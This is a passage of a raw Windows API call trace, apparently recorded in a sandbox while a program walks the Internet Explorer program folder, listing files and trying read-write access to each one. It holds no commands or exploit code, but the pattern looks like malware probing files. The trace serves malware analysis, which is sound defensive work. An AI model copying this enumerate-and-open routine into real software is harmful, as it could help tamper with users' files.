lpNewFilePointer=0x0) returned 1 [0089.817] CloseHandle (hObject=0x420) returned 1 [0089.817] AreFileApisANSI () returned 1 [0089.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0089.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0089.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\iexplore.exe") returned 48 [0089.818] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.818] GetLastError () returned 0x5 [0089.818] GetLastError () returned 0x5 [0089.818] SetLastError (dwErrCode=0x5) [0089.818] GetLastError () returned 0x5 [0089.818] SetLastError (dwErrCode=0x5) [0089.818] GetLastError () returned 0x5 [0089.818] SetLastError (dwErrCode=0x5) [0089.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0089.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0089.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0089.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.818] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d846d9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a485593, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="images", cAlternateFileName="")) returned 1 [0089.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0089.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0089.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0089.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0089.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0089.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0089.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0089.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0089.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0089.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0089.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0089.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.819] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.819] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.819] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0089.819] AreFileApisANSI () returned 1 [0089.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\images", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\images", lpUsedDefaultChar=0x0) returned 42 [0089.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0089.819] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.819] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0089.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0089.819] AreFileApisANSI () returned 1 [0089.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0089.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x66f40 [0089.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x66f40, cchWideChar=42 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\images") returned 42 [0089.819] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\images" (normalized: "c:\\program files\\internet explorer\\images"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.819] GetLastError () returned 0x5 [0089.819] GetLastError () returned 0x5 [0089.819] SetLastError (dwErrCode=0x5) [0089.819] GetLastError () returned 0x5 [0089.819] SetLastError (dwErrCode=0x5) [0089.819] GetLastError () returned 0x5 [0089.819] SetLastError (dwErrCode=0x5) [0089.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x66f40 | out: hHeap=0x20000) returned 1 [0089.820] AreFileApisANSI () returned 1 [0089.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0089.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x67960 [0089.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x67960, cchWideChar=42 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\images") returned 42 [0089.820] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\images" (normalized: "c:\\program files\\internet explorer\\images"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.820] GetLastError () returned 0x5 [0089.820] GetLastError () returned 0x5 [0089.820] SetLastError (dwErrCode=0x5) [0089.820] GetLastError () returned 0x5 [0089.820] SetLastError (dwErrCode=0x5) [0089.820] GetLastError () returned 0x5 [0089.820] SetLastError (dwErrCode=0x5) [0089.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67960 | out: hHeap=0x20000) returned 1 [0089.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0089.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0089.820] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.820] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.820] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.820] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0089.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0089.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0089.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0089.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0089.820] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb77a1634, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb77a1634, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SIGNUP", cAlternateFileName="")) returned 1 [0089.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0089.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0089.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0089.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0089.820] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Internet Explorer\\images\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78110 [0089.821] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d846d9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a485593, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.821] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a55ea4d, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a55ea4d, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a55ea4d, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1536, dwReserved0=0x0, dwReserved1=0x0, cFileName="bing.ico", cAlternateFileName="")) returned 1 [0089.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0089.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0089.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0089.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0089.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0089.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0089.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0089.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0089.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0089.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0089.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0089.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0089.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8af48 [0089.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0089.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0089.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0089.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0089.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.822] AreFileApisANSI () returned 1 [0089.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\images\\bing.ico", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\images\\bing.ico", lpUsedDefaultChar=0x0) returned 51 [0089.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0089.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0089.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0089.822] AreFileApisANSI () returned 1 [0089.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0089.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x460b8 [0089.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\images\\bing.ico") returned 51 [0089.822] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\images\\bing.ico" (normalized: "c:\\program files\\internet explorer\\images\\bing.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0089.823] GetFileType (hFile=0x27c) returned 0x1 [0089.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0089.823] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.823] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.824] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.824] CloseHandle (hObject=0x27c) returned 1 [0089.824] AreFileApisANSI () returned 1 [0089.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0089.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46358 [0089.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x46358, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\images\\bing.ico") returned 51 [0089.824] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\images\\bing.ico" (normalized: "c:\\program files\\internet explorer\\images\\bing.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.824] GetLastError () returned 0x5 [0089.824] GetLastError () returned 0x5 [0089.824] SetLastError (dwErrCode=0x5) [0089.824] GetLastError () returned 0x5 [0089.824] SetLastError (dwErrCode=0x5) [0089.824] GetLastError () returned 0x5 [0089.824] SetLastError (dwErrCode=0x5) [0089.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0089.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0089.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0089.825] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.825] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.825] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x64, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x76190, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x64, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ge", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ᔶ")) returned 0 [0089.825] FindClose (in: hFindFile=0x78110 | out: hFindFile=0x78110) returned 1 [0089.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0089.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0089.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0089.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0089.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0089.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0089.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0089.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0089.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0089.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0089.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0089.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0089.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0089.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0089.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0089.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0089.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a430 [0089.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0089.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0089.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0089.825] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.825] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.825] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.825] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0089.825] AreFileApisANSI () returned 1 [0089.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\SIGNUP", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\SIGNUP", lpUsedDefaultChar=0x0) returned 42 [0089.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0089.826] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.826] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0089.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0089.826] AreFileApisANSI () returned 1 [0089.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0089.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x67480 [0089.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x67480, cchWideChar=42 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\SIGNUP") returned 42 [0089.826] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP" (normalized: "c:\\program files\\internet explorer\\signup"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.826] GetLastError () returned 0x5 [0089.826] GetLastError () returned 0x5 [0089.826] SetLastError (dwErrCode=0x5) [0089.826] GetLastError () returned 0x5 [0089.826] SetLastError 